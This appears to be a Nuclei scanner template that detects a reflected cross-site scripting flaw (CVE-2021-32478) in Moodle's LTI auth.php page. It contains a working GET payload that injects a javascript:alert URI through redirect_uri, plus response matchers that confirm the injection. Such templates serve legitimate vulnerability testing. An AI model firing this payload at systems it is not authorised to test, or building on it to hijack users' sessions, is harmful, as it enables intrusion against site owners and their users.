id: moodle-xss

info:
  name: Moodle - Cross-Site Scripting
  author: hackergautam
  severity: medium
  description: Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, and earlier unsupported versions contain a cross-site scripting vulnerability via the redirect_uri parameter.
  reference:
    - https://twitter.com/JacksonHHax/status/1391367064154042377
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32478
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 1
  tags: moodle,xss,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{randstr}}'
          - '<form action="javascript:alert'
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"

# digest: 4a0a0047304502200c5950e76cfac32c79ced10a70fbb6443a5973d5e56ca6e5d213e4a6ab2fd1e0022100b03fa2043dcde4e735d41930c21a9b421b62e070410f8e525a5f22b368b82395:922c64590222798bb761d5b6d8e72950
